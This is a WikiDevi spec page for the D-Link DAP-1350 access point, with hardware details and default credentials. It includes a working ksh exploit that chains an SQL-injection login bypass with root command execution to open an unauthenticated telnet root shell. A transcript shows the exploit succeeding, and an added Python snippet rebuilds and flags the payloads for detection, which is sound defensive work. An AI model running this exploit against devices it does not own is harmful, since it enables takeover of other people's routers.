
D-Link DAP-1350 rev A1

From WikiDevi

D-Link DAP-1350 A1
Availability: now

Manuf/OEM/ODM Cameo

FCC approval date: 15 September 2009
Country of manuf.: China


ASIN: B003Q9AZHU (US)
multiple revisions of this device, use caution

Type: wireless router, access point

FCC ID: KA2AP1350A1
Industry Canada ID: 4216A-AP1350

Power: 5 VDC, 2.5 A
Connector type: barrel

CPU1: Ralink RT3052 (384 MHz)
FLA1: 8 MiB (Macronix MX29LV640EBTI-70G)
RAM1: 32 MiB (ESMT M12L128168A-7T × 2)

Expansion IFs: USB 2.0
USB ports: 1

WI1 chip1: Ralink RT3052
WI1 802dot11 protocols: bgn
WI1 MIMO config: 2x2:2
WI1 antenna connector: none

ETH chip1: Ralink RT3052
LAN speed: 10/100
LAN ports: 1


Stock FW OS: Linux

Third party firmware supported: OpenWrt

Default SSID: dlink (38 addl. devices)
Default IP address: 192.168.0.50
the IP 192.168.0.50 is used by 62 additional devices
of which 62 are D-Link devices
Default login user: admin
Default login password: blank
admin:blank credentials used by 314 additional devices
of which 179 are D-Link devices

802dot11 OUI: 00:18:E7 (10 E, 20 W, 2008)
Ethernet OUI: 00:18:E7 (10 E, 20 W, 2008)

For a list of all currently documented Ralink chipsets with specifications, see Ralink.


Wireless N Pocket Router & Access Point

Product page • Interface emulator

Forum threads

OpenWrt trunk contains support for the DAP-1350; the 12.09-beta build, however, is broken.
Build your own firmware from trunk for now, or wait for the Attitude Adjustment release.

Enabling telnet

A vulnerability in the stock firmware allows arbitrary commands to be executed as root via HTTP POST requests to the web interface's CGI program (my_cgi.cgi).

A second vulnerability, an SQL injection in the login handler, allows the HTTP authentication to be bypassed, so the two can be chained without knowing the admin password.

exploit.sh (the name used in the session transcript below):

#!/bin/ksh

# DAP-1350 telnetd, by brynet.
# This affects all stock firmware images for the device.
# Tested on OpenBSD.
#
# Two requests to my_cgi.cgi: an SQL-injection login that bypasses the
# password check, then an admin_webtelnet request that runs an arbitrary
# command as root. The command started here is telnetd with -l /bin/sh,
# i.e. an unauthenticated root shell on port 23.

if [ $# -ne 1 ]; then
	echo "usage: $0 host or ip"
	exit 1
fi
host=$1

# Emit one complete POST for the given form body. printf is used instead of
# echo so the \r\n line endings do not depend on the shell's echo flavour,
# and ${#body} gives an exact Content-Length.
post() {
	body=$1
	printf 'POST /my_cgi.cgi?0.2592357019893825 HTTP/1.1\r\n'
	printf 'Host: %s\r\nConnection: keep-alive\r\n' "$host"
	printf 'Content-Type: application/x-www-form-urlencoded\r\n'
	printf 'Content-Length: %d\r\n\r\n%s' "${#body}" "$body"
}

# user_name=admin
# user_pwd=';select 1;--
# (both fields are base64 without padding, as the stock UI sends them)
login_cmd="request=login&user_name=YWRtaW4&user_pwd=JztzZWxlY3QgMTstLQ"

# A successful login is recognised by the string "default" in the response.
if post "$login_cmd" | nc "$host" 80 | grep default > /dev/null 2>&1; then
	echo "Authenticated."
else
	echo "Failed."
	exit 1
fi

# %20 is the URL-encoded space between telnetd and its -l option.
telnetd_cmd="request=admin_webtelnet&cmd=/usr/sbin/telnetd%20-l/bin/sh"
post "$telnetd_cmd" | nc "$host" 80 > /dev/null 2>&1

# Give telnetd a moment to bind, then check that port 23 is listening.
sleep 2
if nc -z "$host" 23 > /dev/null 2>&1; then
	echo "Root shell, okey doke."
	telnet "$host"
else
	echo "No root.. sorry, heh."
	exit 1
fi

Note: nc(1) may be installed as netcat(1) on some systems. Modify as necessary.

    $ ./exploit.sh dlinkap # 192.168.0.50
    Authenticated.
    Root shell, okey doke.
    Trying 192.168.0.50...
    Connected to dlinkap.
    Escape character is '^]'.
    ... motd/etc.
    #

The factory-set root password is unknown, so telnetd is started with -l /bin/sh rather than through login(1): anyone who can reach port 23 gets a root shell with no authentication.
The telnetd process does not survive a reboot, so the script must be run again each time the device is powered on.
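As an added example (not part of the original page or brynet's script), the following Python reproduces the two form bodies the script sends and shows how a proxy or log-inspection check could flag them. The field names (request, user_name, user_pwd, cmd), the unpadded base64 encoding of the login fields and the my_cgi.cgi endpoint come from the script above; the SQL-metacharacter rule and the benign sample body are assumptions, since the page does not show the backend query.

```python
"""Build and classify DAP-1350 my_cgi.cgi POST bodies.

Added example, not code from the original page or from brynet's script.
The field names and the unpadded base64 encoding are taken from the ksh
script; the SQL-metacharacter rule and the benign sample are assumptions.
"""
import base64
import re
from urllib.parse import parse_qs, quote

# Two bodies are exactly what the ksh script sends; the third is a
# constructed benign login (admin / "password") for comparison.
SAMPLE_BODIES = {
    "sqli_login": "request=login&user_name=YWRtaW4&user_pwd=JztzZWxlY3QgMTstLQ",
    "telnetd": "request=admin_webtelnet&cmd=/usr/sbin/telnetd%20-l/bin/sh",
    "benign_login": "request=login&user_name=YWRtaW4&user_pwd=cGFzc3dvcmQ",
}

# Quotes, statement separators and comment openers should never appear in a
# decoded credential if the backend concatenates it into an SQL string.
# (Assumption: the page only shows that ';select 1;-- works.)
SQL_META = re.compile(r"['\";]|--|/\*")


def b64_unpadded(text: str) -> str:
    """Base64 without trailing '=' padding, the form the stock UI sends
    (YWRtaW4 and JztzZWxlY3QgMTstLQ on the page are unpadded)."""
    return base64.b64encode(text.encode()).decode().rstrip("=")


def b64_lenient(value: str) -> str:
    """Decode base64 with or without padding; return '' on invalid input.
    A strict decoder would reject the device's unpadded fields outright."""
    value = value.strip()
    value += "=" * (-len(value) % 4)
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def build_login_body(user: str, pwd: str) -> str:
    """Form body for request=login, matching the script's encoding."""
    return "request=login&user_name=%s&user_pwd=%s" % (
        quote(b64_unpadded(user), safe=""),
        quote(b64_unpadded(pwd), safe=""),
    )


def build_cmd_body(cmd: str) -> str:
    """Form body for request=admin_webtelnet (space becomes %20)."""
    return "request=admin_webtelnet&cmd=%s" % quote(cmd, safe="/")


def classify_request(body: str) -> dict:
    """Decode one POST body and report what it is trying to do.

    Returns {'action': str, 'findings': [tags], 'decoded': {field: value}}.
    """
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    action = form.get("request", "")
    findings, decoded = [], {}
    if action == "login":
        for field in ("user_name", "user_pwd"):
            decoded[field] = b64_lenient(form.get(field, ""))
            if SQL_META.search(decoded[field]):
                findings.append("sqli_in_" + field)
    elif action == "admin_webtelnet":
        # Any use of this request type is remote root command execution.
        decoded["cmd"] = form.get("cmd", "")
        findings.append("root_command_execution")
    return {"action": action, "findings": findings, "decoded": decoded}


if __name__ == "__main__":
    for name, body in SAMPLE_BODIES.items():
        print(name, classify_request(body))
```

The lenient decoder is the part worth copying: the device accepts base64 without padding, so a detection rule built on a strict decoder would silently miss the login fields and report nothing.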